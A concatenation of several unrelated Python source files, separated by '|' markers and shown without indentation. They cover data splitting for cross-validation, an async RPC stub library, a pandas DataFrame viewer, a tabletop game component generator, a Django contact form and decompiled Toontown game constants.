for j, (train_index, valid_index) in enumerate(skf_inner.split(X[full_train_index,0], X[full_train_index,1])):
data_train = create_data(np.random.permutation(train_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#data_train.to_csv('Data/train_outer%d_inner%d.csv'%(i,j), index=False)
data_train.to_csv('../Data/train%s.csv'%postfix, index=False)
data_valid = create_data(np.random.permutation(valid_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#data_valid.to_csv('Data/valid_outer%d_inner%d.csv'%(i,j), index=False)
data_valid.to_csv('../Data/valid%s.csv'%postfix, index=False)
break # dont do full cv
data_test = create_data(np.random.permutation(test_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits)
#np.savetxt('Data/test_outer%d.txt'%i,data_test,fmt=s)
data_test.to_csv('../Data/test%s.csv'%postfix,index=False)
break # dont do full cv
if __name__ =="__main__":
create_cv()
|
from typing import Awaitable, Generic, List, Optional, TypeVar, Union
from .data import RpcMethod as RpcMethodDecl
from .data import Subscription as SubscriptionDecl
from .data import Deserializer, Serializer, ServiceMethod
EventPayload = TypeVar('EventPayload')
RpcReqPayload = TypeVar('RpcReqPayload')
RpcRespPayload = TypeVar('RpcRespPayload')
class Stub:
service = ''
def __init__(self, sif) -> None:
self.sif = sif
class Rpc(Generic[RpcReqPayload, RpcRespPayload]):
def __init__(
self,
stub: Stub,
method: str,
transport: Union[str, List[str]],
req_serializer: Optional[Serializer]=None,
req_deserializer: Optional[Deserializer]=None,
resp_serializer: Optional[Serializer]=None,
resp_deserializer: Optional[Deserializer]=None,
) -> None:
self.stub = stub
self.sif = stub.sif
self.service = stub.service
self.method = method
self.transport = transport
self.decl = RpcMethodDecl(
self.service,
self.method,
self.transport,
req_serializer=req_serializer,
req_deserializer=req_deserializer,
resp_serializer=resp_serializer,
resp_deserializer=resp_deserializer,
)
self.sif.add_decl(self.decl)
def __call__(self, payload: RpcReqPayload) -> Awaitable[RpcRespPayload]:
return self.call(payload)
async def call(self, payload: RpcReqPayload) -> RpcRespPayload:
call = self.sif.create_rpc_call(
self.service,
self.method,
payload,
)
await self.sif.call(call)
return await call.fut
def listen(
self,
func: ServiceMethod[RpcReqPayload, RpcRespPayload],
) -> None:
self.sif.add_rpc_method(self.decl, func)
class Sub(Generic[EventPayload]):
def __init__(
self,
stub: Stub,
topic: str,
transport: Union[str, List[str]],
serializer: Optional[Serializer]=None,
deserializer: Optional[Deserializer]=None
) -> None:
self.stub = stub
self.sif = stub.sif
self.service = stub.service
self.topic = topic
self.transport = transport
self.decl = SubscriptionDecl(
self.service,
self.topic,
self.transport,
serializer=serializer,
deserializer=deserializer,
)
self.sif.add_decl(self.decl)
def __call__(self, payload: EventPayload) -> Awaitable[None]:
return self.call(payload)
async def call(self, payload: EventPayload) -> None:
event = self.sif.create_event(self.service, self.topic, payload)
await self.sif.push(event)
def listen(self, func: ServiceMethod[EventPayload, None]):
self.sif.add_subscriber(self.decl, func)
|
import os
from dotenv import load_dotenv
load_dotenv(override=True)
API_TOKEN = os.getenv("API_TOKEN")
ACCESS_ID = os.getenv("ACCESS_ID")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__title__ = 'DataViewer'
__author__ = 'Tanner S Eastmond'
__contact__ = 'https://github.com/tseastmond'
__license__ = 'MIT'
import pandas as pd
import wx
import wx.lib.mixins.listctrl as listmix
from _data import _data
from _pagetwo import _pagetwo
from _pagethree import _pagethree
###############################################################################
###############################################################################
###############################################################################
class DataViewer(wx.Frame):
'''
This class is a data viewer for Pandas DataFrames that allows the user
to view, filter, and calculate summary statistics for each column.
'''
###########################################################################
###########################################################################
def __init__(self, df, rows=100):
'''
This class is a data viewer for Pandas DataFrames that allows the user
to view, filter, and calculate summary statistics for each column.
Parameters
----------
df : Pandas DataFrame
The data to view.
rows : int
Number of rows to show simultaneously.
'''
# Initialize the app.
print('initializing')
self.app = wx.App()
print('done')
# Set up the actual frame.
wx.Frame.__init__(self, None, title='Pandas DataFrame Viewer')
# Make a panel and a notebook.
panel = wx.Panel(self)
notebook = wx.Notebook(panel)
# Set up the pages.
page1 = _data(notebook, df, rows)
page2 = _pagetwo(notebook)
page3 = _pagethree(notebook)
# Actually add the pages.
notebook.AddPage(page1,'Data')
notebook.AddPage(page2,'Page 2')
notebook.AddPage(page3,'Page 3')
# Size the notebook correctly.
sizer = wx.BoxSizer()
sizer.Add(notebook, 1, wx.EXPAND)
panel.SetSizer(sizer)
# Set a status bar.
self.CreateStatusBar(1)
self.SetStatusText('{0} Columns, {1} Rows'.format(len(df.columns), page1.list.GetItemCount()))
# Ensure the app closes when exit button is clicked.
closeBtn = wx.Button(panel, label="Close")
closeBtn.Bind(wx.EVT_BUTTON, self.onClose)
# Show and loop.
self.Show()
self.app.MainLoop()
# Delete the app.
del self.app
###########################################################################
###########################################################################
def onClose(self, event):
self.Destroy()
###############################################################################
###############################################################################
###############################################################################
if __name__ == '__main__':
df = pd.read_csv(r'C:\Users\tanne\OneDrive\Python\san_diego_unified\principals\clean.csv', encoding='latin')
df.head()
df.iloc[-2]
df.tail()
DataViewer(df, rows=-100)
|
# encoding: utf-8
from typing import List, Dict
import math
from collections import OrderedDict
import json
ATTRS_IN_ORDER = [
"name",
# display
"top",
"left",
"height",
"width",
"color",
"textColor",
"showImage",
"text",
"text_ja",
"textAlign",
"image",
"faceupImage",
"faceupText",
"faceupText_ja",
"facedownImage",
"facedownText",
"facedownText_ja",
"counterValue",
# behavior
"handArea",
"draggable",
"flippable",
"ownable",
"resizable",
"rollable",
"traylike",
"counter",
'boxOfComponents',
'cardistry',
'positionOfBoxContents',
'stowage',
"onAdd",
'toolboxFunction',
'editable',
# current status
"owner",
"faceup",
"zIndex",
]
def in_order(component):
result = OrderedDict()
keys = set(component.keys())
for k in ATTRS_IN_ORDER:
if k not in keys:
continue
result[k] = component[k]
keys.remove(k)
if len(keys) > 0:
raise ValueError(f"component contains unknown keys: {keys}")
return result
class Box:
def __init__(self, kit: 'Kit', box_component: Dict = None):
self.kit: 'Kit' = kit
self.box_component: Dict = box_component
self.content_names: List[str] = []
def add_component(self, data, template=None):
self.kit.registry.add_component(data, template=template)
self.content_names.append(data['name'])
@property
def box_component(self):
return self._box_component
@box_component.setter
def box_component(self, box_component):
self._box_component = box_component
if box_component:
self.kit.registry.add_component(box_component)
def use_components(self, components):
for c in components:
if type(c) == str:
self.content_names.append(c)
else:
raise ValueError()
class Kit:
def __init__(self, registry: 'ComponentRegistry'):
self.registry: 'ComponentRegistry' = registry
self._description: Dict = {}
self.direct_component_names: List[str] = []
self.boxes: List[Box] = []
def box(self, box_component=None) -> Box:
box = Box(self, box_component)
self.boxes.append(box)
return box
def add_component(self, data, template=None):
self.registry.add_component(data, template=template)
self.direct_component_names.append(data['name'])
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
class ComponentRegistry:
def __init__(self):
self.components: List = []
self.kits: List[Kit] = []
def add_component(self, data, template=None):
if template:
completeData = template.copy()
completeData.update(data)
else:
completeData = data.copy()
for c in self.components:
if c['name'] == completeData['name']:
assert c == completeData
break
else:
self.components.append(in_order(completeData))
def kit(self) -> Kit:
kit = Kit(self)
self.kits.append(kit)
return kit
def build_data_for_deploy(self):
data_for_deploy = {}
data_for_deploy['components'] = [{'component': c} for c in self.components]
data_for_deploy['kits'] = []
for kit in self.kits:
kit_data = kit.description.copy()
used_component_names = set()
used_component_names.update(kit.direct_component_names)
kit_data['boxAndComponents'] = {}
for direct_component_name in kit.direct_component_names:
assert direct_component_name not in kit_data['boxAndComponents']
kit_data['boxAndComponents'][direct_component_name] = None
for box in kit.boxes:
box_name = box.box_component['name']
assert box_name not in kit_data['boxAndComponents'], f"kit_data {kit_data}"
kit_data['boxAndComponents'][box_name] = box.content_names
used_component_names.update([box_name] + box.content_names)
data_for_deploy['kits'].append({'kit': kit_data})
kit_data['usedComponentNames'] = sorted(list(used_component_names)) # sort for stabilize test
return data_for_deploy
def generate_toolbox(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Toolbox",
"label": "Toolbox",
"label_ja": "道具箱",
"width": "400px",
"height": "300px"
}
box = kit.box({
"name": "Toolbox",
"text": "Toolbox",
"text_ja": "道具箱",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "300px",
"width": "460px",
"color": "darkgray",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ["collect"],
"zIndex": 1,
})
template = {
"height": "100px",
"width": "125px",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"color": "cyan",
"textColor": "black",
}
z_index = 100
offset = 0
card = {
"name": "Export Table",
"top": f"{int(offset / 3) * 110}px",
"left": f"{(offset % 3) * 135 + 60}px",
"text": "Export Table",
"toolboxFunction": "export table",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
card = {
"name": "Upload Kit",
"top": f"{int(offset / 3) * 110}px",
"left": f"{(offset % 3) * 135 + 60}px",
"text": "Upload Kit",
"toolboxFunction": "upload kit",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
def generate_note(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Note",
"label": "Note",
"label_ja": "メモ",
"width": "100px",
"height": "75"
}
kit.add_component({
"name": "Note",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "75px",
"width": "100px",
"text": "(Double click to edit)",
"color": '#feff9c',
"textColor": 'black',
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"editable": True,
})
def generate_dice(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Dice (Blue)",
"label": "Dice (Blue)",
"label_ja": "サイコロ(青)",
"width": "64px",
"height": "64px"
}
kit.add_component({
"name": "Dice (Blue)",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "64px",
"width": "64px",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": True,
"ownable": False,
"onAdd": "function(component) { \n"
" component.rollFinalValue = Math.floor(Math.random() * 6) + 1;\n"
" component.rollDuration = 500;\n"
" component.startRoll = true;\n"
"}"
})
def generate_playing_card(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Playing Card",
"label": "Playing Card",
"label_ja": "トランプ",
"width": "400px",
"height": "150px"
}
box = kit.box({
"name": "Playing Card Box",
"handArea": False,
"top": "0px",
"left": "0px",
"height": "200px",
"width": "250px",
"color": "blue",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ["spread out", "collect", "shuffle", 'flip all'],
"zIndex": 1,
})
template = {
"height": "100px",
"width": "75px",
"showImage": True,
"faceupImage": "/static/images/playing_card_up.png",
"facedownImage": "/static/images/playing_card_back.png",
"facedownText": "",
"faceup": False,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
for suit, prefix, color in [("♠", "S", "black"), ("♥", "H", "red"), ("♦", "D", "red"), ("♣", "C", "black")]:
for rank in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
card = {
"name": f"PlayingCard {prefix}_{rank}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"textColor": color,
"faceupText": f"{suit}{rank}",
"zIndex": z_index,
}
box.add_component(card, template=template)
z_index -= 1
offset += 1
for i in range(2):
card = {
"name": f"JOKER{i + 1}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"textColor": "black",
"faceupText": "JOKER",
"zIndex": z_index,
}
card.update(template)
box.add_component(card, template=template)
z_index -= 1
offset += 1
kit.add_component({
"name": "Stowage for Unused Cards",
"handArea": False,
"top": "0px",
"left": "300px",
"height": "150px",
"width": "150px",
"text": "Place cards you don't need now here",
"text_ja": "使わないカード置き場",
"color": "darkgrey",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": True,
"rollable": False,
"ownable": False,
"traylike": True,
"stowage": True,
"boxOfComponents": False,
"zIndex": 1,
})
def generate_psychological_safety_game(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Psychological Safety Game",
"label": "Psychological Safety Game",
"label_ja": "心理的安全性ゲーム",
"width": "550px",
"height": "750px"
}
template = {
"height": "120px",
"width": "83px",
"showImage": True,
"faceup": False,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
voice_card_box = kit.box()
for voice in range(35):
card = {
"name": f"PsychologicalSafety V{voice + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupImage": f"/static/images/psychological_safety_v{voice + 1:02}.jpg",
"facedownImage": "/static/images/psychological_safety_voice_back.png",
"zIndex": z_index,
}
voice_card_box.add_component(card, template=template)
z_index -= 1
offset += 1
offset = 0
situation_card_box = kit.box()
for situation in range(14):
card = {
"name": f"PsychologicalSafety S{situation + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupImage": f"/static/images/psychological_safety_s{situation + 1:02}.jpg",
"facedownImage": "/static/images/psychological_safety_situation_back.png",
"zIndex": z_index,
}
situation_card_box.add_component(card, template=template)
z_index -= 1
offset += 1
kit.add_component({
"name": "PsychologicalSafety Board",
"top": "0",
"left": "0",
"height": "500px",
"width": "354px",
"showImage": True,
"image": "/static/images/psychological_safety_board.png",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"traylike": True,
"zIndex": 0,
})
z_index -= 1
voice_card_box.box_component = {
"name": "PsychologicalSafety Box for Voice",
"handArea": False,
"top": "0px",
"left": "380px",
"height": "200px",
"width": "350px",
"color": "yellow",
"text": "Situation Cards",
"text_ja": "発言&オプションカード",
"textColor": "black",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ['spread out', 'collect', 'shuffle', 'flip all'],
"zIndex": 0,
}
z_index -= 1
situation_card_box.box_component = {
"name": "PsychologicalSafety Box for Situation",
"handArea": False,
"top": "220px",
"left": "380",
"height": "150px",
"width": "350px",
"color": "green",
"text": "Situation Cards",
"text_ja": "状況カード",
"textColor": "black",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": True,
"cardistry": ['spread out', 'collect', 'shuffle', 'flip all'],
"zIndex": 0,
}
z_index -= 1
kit.box({
"name": "PsychologicalSafety Box for Stones",
"handArea": False,
"top": "390px",
"left": "380px",
"height": "150px",
"width": "250px",
"color": "black",
"text": "Stones",
"text_ja": "石の置き場",
"textColor": "white",
"textAlign": "center bottom",
"showImage": False,
"draggable": True,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": False,
"boxOfComponents": True,
"cardistry": ['collect in mess'],
"positionOfBoxContents": "random",
"zIndex": 0,
}).use_components(
[f"Transparent Stone {stone + 1:02}" for stone in range(4)] * 8
)
z_index -= 1
def generate_coin(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Coin - Tetradrachm of Athens",
"label": "Coin",
"label_ja": "コイン",
"width": "100px",
"height": "100px"
}
kit.add_component({
"name": "Coin - Tetradrachm of Athens",
"top": "0px",
"left": "0px",
"height": "80px",
"width": "80px",
"faceupImage": "/static/images/coin_TetradrachmOfAthens_head.png",
"facedownImage": "/static/images/coin_TetradrachmOfAthens_tail.png",
"showImage": True,
"draggable": True,
"flippable": True,
"ownable": False,
"resizable": True,
})
def generate_counter(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Counter",
"label": "Counter",
"label_ja": "カウンター",
"width": "192px",
"height": "96px"
}
kit.add_component({
"name": "Counter",
"text": "Counter",
"text_ja": "カウンター",
"top": "0px",
"left": "0px",
"width": "192px",
"height": "96px",
"showImage": False,
"draggable": True,
"flippable": False,
"ownable": True,
"resizable": True,
"counter": True,
})
def generate_stones(reg: ComponentRegistry):
template = {
"height": "25px",
"width": "25px",
"showImage": True,
"faceup": False,
"draggable": True,
"flippable": False,
"ownable": True,
"resizable": False,
}
kit = reg.kit()
kit.description = {
"name": "Transparent Stones",
"label": "Transparent Stones",
"label_ja": "宝石(セット)",
"positionOfKitContents": "random",
"width": "100px",
"height": "100px"
}
offset = 0
for stone in range(4):
s = {
"name": f"Transparent Stone {stone + 1:02}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"image": f"/static/images/transparent_stone_{stone + 1:02}.png",
}
kit.add_component(s, template)
offset += 1
def generate_planning_poker(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Planning Poker",
"label": "Planning Poker",
"label_ja": "プランニングポーカー",
"positionOfKitContents": "on all hand areas",
"width": "400px",
"height": "150px"
}
template = {
"height": "40x",
"width": "30px",
"color": "bisque",
"textColor": "black",
"showImage": False,
"facedownText": "Planning Poker",
"faceup": True,
"draggable": True,
"flippable": True,
"ownable": True,
"resizable": False,
}
z_index = 100
offset = 0
for point in ["0", "1/2", "1", "2", "3", "5", "8", "13", "20", "40", "100", "∞", "?", "\u2615"]:
card = {
"name": f"PlanningPoker {point}",
"top": f"{offset}px",
"left": f"{offset + 100}px",
"faceupText": f"{point}",
"zIndex": z_index,
}
kit.add_component(card, template=template)
z_index -= 1
offset += 1
def generate_diamong_game(reg: ComponentRegistry):
kit = reg.kit()
kit.description = {
"name": "Diamond Game",
"label": "Chinese Checker",
"label_ja": "ダイヤモンドゲーム",
"width": "638px",
"height": "553px"
}
kit.add_component({
"name": "Diamond Game Board",
"handArea": False,
"top": "0",
"left": "0",
"height": "638px",
"width": "553px",
"showImage": True,
"image": "/static/images/diamond_game_board.png",
"draggable": False,
"flippable": False,
"resizable": False,
"rollable": False,
"ownable": False,
"traylike": True,
"boxOfComponents": False,
"zIndex": 1,
})
template = {
"height": "38x",
"width": "27px",
"showImage": True,
"image": "/static/images/piece_A_red.png",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": False,
"zIndex": 2,
}
INTERVAL_W = 40
INTERVAL_H = math.sqrt(3) * (INTERVAL_W / 2)
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece red{i}-{j}",
"top": f"{151 + i * INTERVAL_H}px",
"left": f"{22 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == j == 0:
piece["name"] = "piece red king"
piece["image"] = "/static/images/piece_A_red_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
template.update({
"image": "/static/images/piece_A_yellow.png",
})
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece yellow{i}-{j}",
"top": f"{151 + i * INTERVAL_H}px",
"left": f"{342 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == 0 and j == 4:
piece["name"] = "piece yellow king"
piece["image"] = "/static/images/piece_A_yellow_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
template.update({
"image": "/static/images/piece_A_green.png",
})
for i in range(5):
for j in range(5 - i):
piece = {
"name": f"piece green{i}-{j}",
"top": f"{433 + i * INTERVAL_H}px",
"left": f"{181 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px",
}
if i == 4:
piece["name"] = "piece green king"
piece["image"] = "/static/images/piece_A_green_king.png",
piece["height"] = "52px"
kit.add_component(piece, template)
def write_default_table_json():
table = OrderedDict(
components=OrderedDict(),
kits=[],
players=OrderedDict(),
tablename="dummy"
)
table["components"]["title"] = {
"name": "title",
"top": "20px",
"left": "20px",
"width": "300px",
"height": "40px",
"text": "Welcome to a new table!",
"text_ja": "新しいテーブルへようこそ!",
"color": "blue",
"draggable": True,
"flippable": False,
"ownable": False,
"resizable": True,
"showImage": False,
"zIndex": 1,
}
table["components"]["usage"] = {
"name": "usage",
"top": "20px",
"left": "340px",
"height": "250px",
"width": "400px",
"color": "darkgoldenrod",
"showImage": False,
"faceupText": "- Use Add / Remove Kits (to the left) have components on the table\n - Drag to move\n - Double click to flip\n - Drag the table to scroll\n - Share URL to invite people\n - Add Hand Area (to the left) to have your own cards (hand)\n - Cards in your hand won't be seen by others\n - Enjoy! but you might encounter some issues... Please let us know when you see one",
"faceupText_ja": " - 左の「テーブルに出す」からトランプなどを取り出す\n - ドラッグで移動\n - ダブルクリックで裏返す\n - テーブルをドラッグしてスクロール\n - URLをシェアすれば招待できる\n - 左の「手札エリアを作る」で自分の手札エリアを作る\n - 手札エリアに置いたカードは自分のものになり 表にしても見えない\n - まだ不具合や未実装の部分があります。気になる点はお知らせください",
"facedownText": "How to use (double click to read)",
"facedownText_ja": "使い方 (ダブルクリックしてね)",
"draggable": True,
"flippable": True,
"ownable": False,
"resizable": True,
"zIndex": 2,
}
with open("store/default_table.json", "w", encoding="utf-8") as f:
json.dump(table, f, indent=2)
def write_initial_deploy_data_json():
registry = ComponentRegistry()
generate_toolbox(registry)
generate_note(registry)
generate_dice(registry)
generate_playing_card(registry)
generate_psychological_safety_game(registry)
generate_coin(registry)
generate_counter(registry)
generate_stones(registry)
generate_planning_poker(registry)
generate_diamong_game(registry)
with open("initial_deploy_data.json", "w", encoding="utf-8") as f:
json.dump(registry.build_data_for_deploy(), f, indent=2)
if __name__ == "__main__":
write_default_table_json()
write_initial_deploy_data_json()
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django.core.mail import send_mail
class ContactForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
content = forms.CharField(
required=True,
widget=forms.Textarea
)
def send_email(self):
return send_mail('New Contact Message', self.cleaned_data['content'], self.cleaned_data['email'], ['[email protected]',])
def __init__(self, *args, **kwargs):
super(ContactForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-contact-form'
self.helper.form_method = 'post'
self.helper.add_input(Submit('submit', 'Submit')) |
# uncompyle6 version 3.3.2
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: toontown.toonbase.ToontownGlobals
import TTLocalizer
from otp.otpbase.OTPGlobals import *
from direct.showbase.PythonUtil import Enum, invertDict
from pandac.PandaModules import BitMask32, Vec4
AccountDatabaseChannelId = 4008
ToonDatabaseChannelId = 4021
DoodleDatabaseChannelId = 4023
DefaultDatabaseChannelId = AccountDatabaseChannelId
DatabaseIdFromClassName = {'Account': AccountDatabaseChannelId}
CogHQCameraFov = 60.0
BossBattleCameraFov = 72.0
MakeAToonCameraFov = 35.0
PieBitmask = BitMask32(256)
PetBitmask = BitMask32(8)
CatchGameBitmask = BitMask32(16)
CashbotBossObjectBitmask = BitMask32(16)
FurnitureSideBitmask = BitMask32(32)
FurnitureTopBitmask = BitMask32(64)
FurnitureDragBitmask = BitMask32(128)
PetLookatPetBitmask = BitMask32(256)
PetLookatNonPetBitmask = BitMask32(512)
FullPies = 65535
CogHQCameraFar = 900.0
CogHQCameraNear = 1.0
CashbotHQCameraFar = 2000.0
CashbotHQCameraNear = 1.0
LawbotHQCameraFar = 3000.0
LawbotHQCameraNear = 1.0
SpeedwayCameraFar = 8000.0
SpeedwayCameraNear = 1.0
MaxMailboxContents = 20
MaxHouseItems = 30
ExtraDeletedItems = 5
DeletedItemLifetime = 7 * 24 * 60
CatalogNumWeeksPerSeries = 13
CatalogNumWeeks = 78
PetFloorCollPriority = 5
PetPanelProximityPriority = 6
P_WillNotFit = -13
P_NotAGift = -12
P_OnOrderListFull = -11
P_MailboxFull = -10
P_NoPurchaseMethod = -9
P_ReachedPurchaseLimit = -8
P_NoRoomForItem = -7
P_NotShopping = -6
P_NotAtMailbox = -5
P_NotInCatalog = -4
P_NotEnoughMoney = -3
P_InvalidIndex = -2
P_UserCancelled = -1
P_ItemAvailable = 1
P_ItemOnOrder = 2
P_ItemUnneeded = 3
GIFT_user = 0
GIFT_admin = 1
GIFT_RAT = 2
GIFT_mobile = 3
GIFT_cogs = 4
FM_InvalidItem = -7
FM_NondeletableItem = -6
FM_InvalidIndex = -5
FM_NotOwner = -4
FM_NotDirector = -3
FM_RoomFull = -2
FM_HouseFull = -1
FM_MovedItem = 1
FM_SwappedItem = 2
FM_DeletedItem = 3
FM_RecoveredItem = 4
SPDonaldsBoat = 3
SPMinniesPiano = 4
CEVirtual = 14
MaxHpLimit = 129
MaxCarryLimit = 80
MaxQuestCarryLimit = 4
MaxCogSuitLevel = 50 - 1
CogSuitHPLevels = (
15 - 1, 20 - 1, 30 - 1, 40 - 1, 50 - 1)
setInterfaceFont(TTLocalizer.InterfaceFont)
setSignFont(TTLocalizer.SignFont)
from toontown.toontowngui import TTDialog
setDialogClasses(TTDialog.TTDialog, TTDialog.TTGlobalDialog)
ToonFont = None
BuildingNametagFont = None
MinnieFont = None
SuitFont = None
def getToonFont():
global ToonFont
if ToonFont == None:
ToonFont = loader.loadFont(TTLocalizer.ToonFont, lineHeight=1.0)
return ToonFont
def getBuildingNametagFont():
global BuildingNametagFont
if BuildingNametagFont == None:
BuildingNametagFont = loader.loadFont(TTLocalizer.BuildingNametagFont)
return BuildingNametagFont
def getMinnieFont():
global MinnieFont
if MinnieFont == None:
MinnieFont = loader.loadFont(TTLocalizer.MinnieFont)
return MinnieFont
def getSuitFont():
global SuitFont
if SuitFont == None:
SuitFont = loader.loadFont(TTLocalizer.SuitFont, pixelsPerUnit=40, spaceAdvance=0.25, lineHeight=1.0)
return SuitFont
DonaldsDock = 1000
ToontownCentral = 2000
TheBrrrgh = 3000
MinniesMelodyland = 4000
DaisyGardens = 5000
ConstructionZone = 6000
FunnyFarm = 7000
GoofySpeedway = 8000
DonaldsDreamland = 9000
BarnacleBoulevard = 1100
SeaweedStreet = 1200
LighthouseLane = 1300
SillyStreet = 2100
LoopyLane = 2200
PunchlinePlace = 2300
WalrusWay = 3100
SleetStreet = 3200
PolarPlace = 3300
AltoAvenue = 4100
BaritoneBoulevard = 4200
TenorTerrace = 4300
ElmStreet = 5100
MapleStreet = 5200
OakStreet = 5300
LullabyLane = 9100
PajamaPlace = 9200
HoodHierarchy = {ToontownCentral: (SillyStreet, LoopyLane, PunchlinePlace), DonaldsDock: (BarnacleBoulevard, SeaweedStreet, LighthouseLane), TheBrrrgh: (WalrusWay, SleetStreet, PolarPlace), MinniesMelodyland: (AltoAvenue, BaritoneBoulevard, TenorTerrace), DaisyGardens: (ElmStreet, MapleStreet, OakStreet), DonaldsDreamland: (LullabyLane, PajamaPlace), GoofySpeedway: ()}
WelcomeValleyToken = 0
BossbotHQ = 10000
BossbotLobby = 10100
SellbotHQ = 11000
SellbotLobby = 11100
SellbotFactoryExt = 11200
SellbotFactoryInt = 11500
CashbotHQ = 12000
CashbotLobby = 12100
CashbotMintIntA = 12500
CashbotMintIntB = 12600
CashbotMintIntC = 12700
LawbotHQ = 13000
LawbotLobby = 13100
LawbotOfficeExt = 13200
LawbotOfficeInt = 13300
LawbotStageIntA = 13300
LawbotStageIntB = 13400
LawbotStageIntC = 13500
LawbotStageIntD = 13600
Tutorial = 15000
MyEstate = 16000
WelcomeValleyBegin = 22000
WelcomeValleyEnd = 61000
DynamicZonesBegin = 61000
DynamicZonesEnd = 1 << 20
cogDept2index = {'c': 0, 'l': 1, 'm': 2, 's': 3}
cogIndex2dept = invertDict(cogDept2index)
HQToSafezone = {SellbotHQ: DaisyGardens, CashbotHQ: DonaldsDreamland, LawbotHQ: TheBrrrgh, BossbotHQ: DonaldsDock}
CogDeptNames = [
TTLocalizer.Bossbot, TTLocalizer.Lawbot, TTLocalizer.Cashbot, TTLocalizer.Sellbot]
def cogHQZoneId2deptIndex(zone):
if zone >= 13000:
return zone <= 13999 and 1
else:
if zone >= 12000:
return 2
else:
if zone >= 11000:
return 3
else:
return 0
def cogHQZoneId2dept(zone):
return cogIndex2dept[cogHQZoneId2deptIndex(zone)]
def dept2cogHQ(dept):
dept2hq = {'c': BossbotHQ, 'l': LawbotHQ, 'm': CashbotHQ, 's': SellbotHQ}
return dept2hq[dept]
MockupFactoryId = 0
MintNumFloors = {CashbotMintIntA: 20, CashbotMintIntB: 20, CashbotMintIntC: 20}
CashbotMintCogLevel = 10
CashbotMintSkelecogLevel = 11
CashbotMintBossLevel = 12
MintNumBattles = {CashbotMintIntA: 4, CashbotMintIntB: 6, CashbotMintIntC: 8}
MintCogBuckRewards = {CashbotMintIntA: 8, CashbotMintIntB: 14, CashbotMintIntC: 20}
MintNumRooms = {CashbotMintIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), CashbotMintIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), CashbotMintIntC: 4 * (10,) + 10 * (11,) + 6 * (12,)}
LawbotStageCogLevel = 10
LawbotStageSkelecogLevel = 11
LawbotStageBossLevel = 12
StageNumBattles = {LawbotStageIntA: 0, LawbotStageIntB: 0, LawbotStageIntC: 0, LawbotStageIntD: 0}
StageNoticeRewards = {LawbotStageIntA: 75, LawbotStageIntB: 150, LawbotStageIntC: 225, LawbotStageIntD: 300}
StageNumRooms = {LawbotStageIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), LawbotStageIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), LawbotStageIntC: 4 * (10,) + 10 * (11,) + 6 * (12,), LawbotStageIntD: 4 * (10,) + 10 * (11,) + 6 * (12,)}
FT_FullSuit = 'fullSuit'
FT_Leg = 'leg'
FT_Arm = 'arm'
FT_Torso = 'torso'
